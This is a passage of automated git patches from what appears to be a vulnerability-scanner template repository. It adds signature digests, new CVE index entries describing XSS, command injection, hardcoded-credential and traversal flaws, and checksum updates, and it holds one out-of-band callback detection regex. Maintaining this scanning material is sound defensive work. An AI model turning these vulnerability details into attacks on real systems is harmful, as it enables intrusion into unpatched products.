'(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$' +# digest: 4a0a00473045022100836a3b8a6b0652ccba5de5d740f9ebe69c24c2ec61e316b7ff34a75a6f4b7f8e02205b9d09c0f06a3828e9e8605e0841ab78f7648a7d82361b5a506ab3b1d88cd9df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/changedetection-unauth.yaml b/http/misconfiguration/changedetection-unauth.yaml index 989db4b97d..2968091e39 100644 --- a/http/misconfiguration/changedetection-unauth.yaml +++ b/http/misconfiguration/changedetection-unauth.yaml @@ -30,3 +30,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100f4b0ac9c92eab0ea4d6fe36f3ec453a9b691a2148aafe9f281e9f6efaa1321b7022100c1e4e18be5f9c2ee3252c843294e680b6f1db68a590357408673dc56d9115085:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/misconfiguration/x11/x11-unauth-access.yaml b/javascript/misconfiguration/x11/x11-unauth-access.yaml index b22f12fe53..dd1f56a6b3 100644 --- a/javascript/misconfiguration/x11/x11-unauth-access.yaml +++ b/javascript/misconfiguration/x11/x11-unauth-access.yaml @@ -46,3 +46,4 @@ javascript: - type: dsl dsl: - response +# digest: 4a0a00473045022100d0d2240ba8d245ea409c87b839a686114e23eaab406679eee71c7dca123cd952022002799f834e0987770604d7578bcae71e697349711f61abff35b52952130cc259:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 15b4bc0ae8adcf008fa9f5201bb1f12584ea81db Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 10:38:19 +0000 Subject: [PATCH 44/46] Auto Generated cves.json [Thu Aug 1 10:38:19 UTC 2024] :robot: --- cves.json | 5 +++++ cves.json-checksum.txt | 2 +- 2 files changed, 6 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index e212a59394..f0e8c3cc10 100644 --- a/cves.json +++ b/cves.json @@ -2276,6 +2276,7 @@ {"ID":"CVE-2023-43187","Info":{"Name":"NodeBB XML-RPC Request xmlrpc.php - XML Injection","Severity":"critical","Description":"A remote code execution (RCE) vulnerability in the xmlrpc.php endpoint of NodeBB Inc NodeBB forum software prior to v1.18.6 allows attackers to execute arbitrary code via crafted XML-RPC requests.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43187.yaml"} {"ID":"CVE-2023-43208","Info":{"Name":"NextGen Healthcare Mirth Connect - Remote Code Execution","Severity":"critical","Description":"Unauthenticated remote code execution vulnerability in NextGen Healthcare Mirth Connect before version 4.4.1.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43208.yaml"} {"ID":"CVE-2023-43261","Info":{"Name":"Milesight Routers - Information Disclosure","Severity":"high","Description":"A critical security vulnerability has been identified in Milesight Industrial Cellular Routers, compromising the security of sensitive credentials and permitting unauthorized access. This vulnerability stems from a misconfiguration that results in directory listing being enabled on the router systems, rendering log files publicly accessible. These log files, while containing sensitive information such as admin and other user passwords (encrypted as a security measure), can be exploited by attackers via the router's web interface. The presence of a hardcoded AES secret key and initialization vector (IV) in the JavaScript code further exacerbates the situation, facilitating the decryption of these passwords. This chain of vulnerabilities allows malicious actors to gain unauthorized access to the router.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-43261.yaml"} +{"ID":"CVE-2023-43323","Info":{"Name":"mooSocial 3.1.8 - External Service Interaction","Severity":"medium","Description":"mooSocial 3.1.8 is vulnerable to external service interaction via multiple parameters in the post function.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-43323.yaml"} {"ID":"CVE-2023-43325","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the data[redirect_url] parameter on user login function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43325.yaml"} {"ID":"CVE-2023-43326","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in multiple url of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43326.yaml"} {"ID":"CVE-2023-43374","Info":{"Name":"Hoteldruid v3.0.5 - SQL Injection","Severity":"critical","Description":"Hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability via the id_utente_log parameter at /hoteldruid/personalizza.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43374.yaml"} @@ -2338,6 +2339,7 @@ {"ID":"CVE-2023-51449","Info":{"Name":"Gradio Hugging Face - Local File Inclusion","Severity":"high","Description":"Gradio LFI when auth is not enabled, affects versions 4.0 - 4.10, also works against Gradio \u003c 3.33\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-51449.yaml"} {"ID":"CVE-2023-51467","Info":{"Name":"Apache OFBiz \u003c 18.12.11 - Remote Code Execution","Severity":"critical","Description":"The vulnerability allows attackers to bypass authentication to achieve a simple Server-Side Request Forgery (SSRF)\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-51467.yaml"} {"ID":"CVE-2023-52085","Info":{"Name":"Winter CMS Local File Inclusion - (LFI)","Severity":"medium","Description":"Winter is a free, open-source content management system. Users with access to backend forms that include a ColorPicker FormWidget can provide a value that would then be included without further processing in the compilation of custom stylesheets via LESS. This had the potential to lead to a Local File Inclusion vulnerability. This issue has been patched in v1.2.4.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-52085.yaml"} +{"ID":"CVE-2023-5222","Info":{"Name":"Viessmann Vitogate 300 - Hardcoded Password","Severity":"critical","Description":"A critical vulnerability in Viessmann Vitogate 300 up to 2.1.3.0 allows attackers to authenticate using hardcoded credentials in the Web Management Interface.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5222.yaml"} {"ID":"CVE-2023-52251","Info":{"Name":"Kafka UI 0.7.1 Command Injection","Severity":"high","Description":"An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-52251.yaml"} {"ID":"CVE-2023-5244","Info":{"Name":"Microweber \u003c V.2.0 - Cross-Site Scripting","Severity":"medium","Description":"Reflected Cross-Site Scripting Vulnerability in types GET parameter on the /editor_tools/rte_image_editor endpoint.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5244.yaml"} {"ID":"CVE-2023-5360","Info":{"Name":"WordPress Royal Elementor Addons Plugin \u003c= 1.3.78 - Arbitrary File Upload","Severity":"critical","Description":"Arbitrary File Upload vulnerability in WordPress Royal Elementor Addons Plugin. This could allow a malicious actor to upload any type of file to your website. This can include backdoors which are then executed to gain further access to your website. This vulnerability has been fixed in version 1.3.79\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5360.yaml"} @@ -2416,6 +2418,7 @@ {"ID":"CVE-2024-24112","Info":{"Name":"Exrick XMall - SQL Injection","Severity":"critical","Description":"XMall v1.1 was discovered to contain a SQL injection vulnerability via the 'orderDir' parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-24112.yaml"} {"ID":"CVE-2024-24131","Info":{"Name":"SuperWebMailer 9.31.0.01799 - Cross-Site Scripting","Severity":"medium","Description":"SuperWebMailer v9.31.0.01799 was discovered to contain a reflected cross-site scripting (XSS) vulenrability via the component api.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-24131.yaml"} {"ID":"CVE-2024-24565","Info":{"Name":"CrateDB Database - Arbitrary File Read","Severity":"medium","Description":"CrateDB is a distributed SQL database that makes it simple to store and analyze massive amounts of data in real-time. There is a COPY FROM function in the CrateDB database that is used to import file data into database tables. This function has a flaw, and authenticated attackers can use the COPY FROM function to import arbitrary file content into database tables, resulting in information leakage.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-24565.yaml"} +{"ID":"CVE-2024-24763","Info":{"Name":"JumpServer \u003c 3.10.0 - Open Redirect","Severity":"medium","Description":"JumpServer is an open source bastion host and an operation and maintenance security audit system. Prior to version 3.10.0, attackers can exploit this vulnerability to construct malicious links, leading users to click on them, thereby facilitating phishing attacks or cross-site scripting attacks. Version 3.10.0 contains a patch for this issue. No known workarounds are available.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-24763.yaml"} {"ID":"CVE-2024-24919","Info":{"Name":"Check Point Quantum Gateway - Information Disclosure","Severity":"high","Description":"CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN, or mobile access software blade.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-24919.yaml"} {"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution – Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"} {"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"} @@ -2467,6 +2470,7 @@ {"ID":"CVE-2024-33610","Info":{"Name":"Sharp Multifunction Printers - Cookie Exposure","Severity":"medium","Description":"It was observed that Sharp printers are vulnerable to a listing of session cookies without authentication. Any attacker can list valid cookies by visiting a backdoor webpage and use them to authenticate to the printers.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-33610.yaml"} {"ID":"CVE-2024-33724","Info":{"Name":"SOPlanning 1.52.00 Cross Site Scripting","Severity":"medium","Description":"SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33724.yaml"} {"ID":"CVE-2024-3400","Info":{"Name":"GlobalProtect - OS Command Injection","Severity":"critical","Description":"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-3400.yaml"} +{"ID":"CVE-2024-34061","Info":{"Name":"Changedetection.io \u003c=v0.45.21 - Cross-Site Scripting","Severity":"medium","Description":"Changedetection.io is a free open source web page change detection, website watcher, restock monitor and notification service. In affected versions Input in parameter notification_urls is not processed resulting in javascript execution in the application. A reflected XSS vulnerability happens when the user input from a URL or POST data is reflected on the page without being stored, thus allowing the attacker to inject malicious content. This issue has been addressed in version 0.45.22. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-34061.yaml"} {"ID":"CVE-2024-34102","Info":{"Name":"Adobe Commerce \u0026 Magento - CosmicSting","Severity":"critical","Description":"Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-34102.yaml"} {"ID":"CVE-2024-34257","Info":{"Name":"TOTOLINK EX1800T TOTOLINK EX1800T - Command Injection","Severity":"high","Description":"TOTOLINK EX1800T V9.1.0cu.2112_B20220316 has a vulnerability in the apcliEncrypType parameter that allows unauthorized execution of arbitrary commands, allowing an attacker to obtain device administrator privileges.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-34257.yaml"} {"ID":"CVE-2024-34351","Info":{"Name":"Next.js - Server Side Request Forgery (SSRF)","Severity":"high","Description":"Next.Js, inferior to version 14.1.1, have its image optimization built-in component prone to SSRF.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-34351.yaml"} @@ -2521,6 +2525,7 @@ {"ID":"CVE-2024-6646","Info":{"Name":"Netgear-WN604 downloadFile.php - Information Disclosure","Severity":"medium","Description":"There is an information leakage vulnerability in the downloadFile.php interface of Netgear WN604. A remote attacker using file authentication can use this vulnerability to obtain the administrator account and password information of the wireless router, causing the router's background to be controlled. The attacker can initiate damage to the wireless network or further threaten it.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-6646.yaml"} {"ID":"CVE-2024-6746","Info":{"Name":"EasySpider 0.6.2 - Arbitrary File Read","Severity":"medium","Description":"A vulnerability classified as problematic was found in NaiboWang EasySpider 0.6.2 on Windows. Affected by this vulnerability is an unknown functionality of the file \\EasySpider\\resources\\app\\server.js of the component HTTP GET Request Handler. The manipulation with the input /../../../../../../../../../Windows/win.ini leads to path traversal: '../filedir'. The attack needs to be done within the local network.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-6746.yaml"} {"ID":"CVE-2024-6922","Info":{"Name":"Automation Anywhere Automation 360 - Server-Side Request Forgery","Severity":"high","Description":"Automation Anywhere Automation 360 v21-v32 is vulnerable to Server-Side Request Forgery in a web API component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6922.yaml"} +{"ID":"CVE-2024-7120","Info":{"Name":"Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90 - Command Injection","Severity":"medium","Description":"A vulnerability, which was classified as critical, was found in Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90. This affects an unknown part of the file list_base_config.php of the component Web Interface. The manipulation of the argument template leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272451.\n","Classification":{"CVSSScore":"6.3"}},"file_path":"http/cves/2024/CVE-2024-7120.yaml"} {"ID":"CVE-2024-7188","Info":{"Name":"Bylancer Quicklancer 2.4 G - SQL Injection","Severity":"high","Description":"A SQL injection vulnerability exists in the Quicklancer 2.4, GET parameter 'range2', that has time-based blind SQL injection and a boolean-based blind SQL injection, which can be exploited remotely by unauthenticated attacker to execute arbitrary SQL queries in the database.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-7188.yaml"} {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"} {"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 699f66a1ce..dbd5588e86 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -b69b59d70bacb648d224873b1b83419e +734828cf4c7ab354d5a5ccb1fed89917 From 440039dea34ffe9083f8ffa3c46780c46b0694ce Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 12:09:14 +0000 Subject: [PATCH 45/46] Auto Generated Templates Checksum [Thu Aug 1 12:09:14 UTC 2024] :robot: --- templates-checksum.txt | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index d132762e06..694371a8e4 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -224,8 +224,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:0f4eb7cbebfc4ff9da2bf1c30de44f37646a82f1 -cves.json-checksum.txt:78d171988a3d739a36543b840766a6feef335ab3 +cves.json:de9d83300996c6f0e401b62eb6db938bfc888be9 +cves.json-checksum.txt:9d55eb8264310fd9a1f4bf219cb0a61263b29f06 dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730 dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -3415,7 +3415,7 @@ http/cves/2024/CVE-2024-1561.yaml:c0921ab0f4b853a4556d2853856c4ce3dae6dd3b http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983 http/cves/2024/CVE-2024-1709.yaml:fbffa10f3832defdae69499878e00010a44c1b0a http/cves/2024/CVE-2024-1728.yaml:53f4b2e0ca6437434e903db273382fb8d009fd46 -http/cves/2024/CVE-2024-20767.yaml:241fd099c8ac13ce65b6bc56f755be96783242a2 +http/cves/2024/CVE-2024-20767.yaml:3663dac621362623cf14b14e7850e6578eaea382 http/cves/2024/CVE-2024-21644.yaml:48021ee39de24e3ea1ef7e900a5a28ebed70f411 http/cves/2024/CVE-2024-21645.yaml:0b8856904f2d109744123490861e51f34afcff6b http/cves/2024/CVE-2024-21650.yaml:4f0a59b8d224262e95327dd4ed30d02741831108 @@ -3435,7 +3435,7 @@ http/cves/2024/CVE-2024-23917.yaml:51738979be19460f2365f47d3eb2eac50d627cb2 http/cves/2024/CVE-2024-24112.yaml:02f1d93189f81a45341e7a2c2bff5f935df70204 http/cves/2024/CVE-2024-24131.yaml:c54d93f7316eb7bfd899c9f03f8a693942e9ec9c http/cves/2024/CVE-2024-24565.yaml:3ce11e2d0ce96ee70c97b3442e730fdcc23b2bb6 -http/cves/2024/CVE-2024-24763.yaml:ea375daef2a1ce97faffb38d4cdee840e3fd3870 +http/cves/2024/CVE-2024-24763.yaml:d55d6a15e871d845e6df1d99873d60d90a1ec949 http/cves/2024/CVE-2024-24919.yaml:0af6fe4076dcedc1a40e7b991c546f6473dbab1c http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05 http/cves/2024/CVE-2024-25669.yaml:859ce6829af85dcbbc97aff746be54b6ab8d4d23 @@ -5563,7 +5563,7 @@ http/misconfiguration/browserless-debugger.yaml:c0e3296fa2d52ff89e0346546043721a http/misconfiguration/cadvisor-exposure.yaml:d236dc86e5e131b98b7c5c5f24d85e219448a249 http/misconfiguration/casdoor-users-password.yaml:bec0721cb2860bc3be2725338624cbeaadb20e1d http/misconfiguration/cgi-test-page.yaml:ce97987c25f63e9ef113fc09ddc2daf5a98c666c -http/misconfiguration/changedetection-unauth.yaml:071cf4423da1b833d7dbc7d4669943e388272534 +http/misconfiguration/changedetection-unauth.yaml:490a17a5c4d6f94ef96c349d248628b97c2c1531 http/misconfiguration/chatgpt-web-unauth.yaml:723a53934bc70af11866cc57d2cc46c3cf5ae119 http/misconfiguration/clickhouse-unauth-api.yaml:50981e20ce91e8483c828bc8dc08342b593c8404 http/misconfiguration/clockwork-dashboard-exposure.yaml:560363ab2aa0f4ee66a559fcd79af2a25a1ec3f3 @@ -8769,7 +8769,7 @@ javascript/misconfiguration/ssh/ssh-weak-algo-supported.yaml:83bdd007c2437f397fa javascript/misconfiguration/ssh/ssh-weak-mac-algo.yaml:5b88f7a8604b8495d2376c87d7ed98e48a5517a7 javascript/misconfiguration/ssh/ssh-weak-public-key.yaml:f6a91e501db1e6dfb6e9ea406e11df4991697d4e javascript/misconfiguration/ssh/ssh-weakkey-exchange-algo.yaml:6749f7256d5cdb6171b77be90c144d7947efcc27 -javascript/misconfiguration/x11/x11-unauth-access.yaml:d1b21a89308ab060b98e68f915d02ab1b1a17de0 +javascript/misconfiguration/x11/x11-unauth-access.yaml:5203d11d0a980db3b9320e60273c35cbe459fdec javascript/udp/detection/tftp-detect.yaml:983f405d3c4b95ad9114371625cab9cdf8e28032 network/backdoor/backdoored-zte.yaml:1dedf67f253983bbc4882b7616078c5a53cbe350 network/c2/7777botnet.yaml:35a2e313d6ac2cc06e061282308083ad0e3c9964 @@ -8953,7 +8953,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:bab688b9113d21c436462a88055b93aae6ef6616 +templates-checksum.txt:bcbec0a1d544044beb40419696a6d0dceb1dcf79 vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 4227f2f4bf6a71776be72dee4f6c94e7f9f84ac6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 12:10:58 +0000 Subject: [PATCH 46/46] Auto Template Signing [Thu Aug 1 12:10:58 UTC 2024] :robot: --- http/cves/2024/CVE-2024-20767.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-20767.yaml b/http/cves/2024/CVE-2024-20767.yaml index 22dc41dc11..045458e095 100644 --- a/http/cves/2024/CVE-2024-20767.yaml +++ b/http/cves/2024/CVE-2024-20767.yaml @@ -53,4 +53,4 @@ http: regex: - "(.*)" internal: true -# digest: 4a0a00473045022100e6a9a13cc692e12629ce4b557e8a9cdaab2f6b3df9155e2bb4f5cac00241469b0220351a6751dda75fd857b8ac90f6cdca44f5853c3c3019070572245e97c7aec3eb:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220203c669fae6e243c8b45e754f6caba7ed4706fef525376c00d09efea9698b787022100ada2f1608d93dcf71799ce34f986e34f83dcd70a2d7ffa05f89dbec7fd0f7b0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file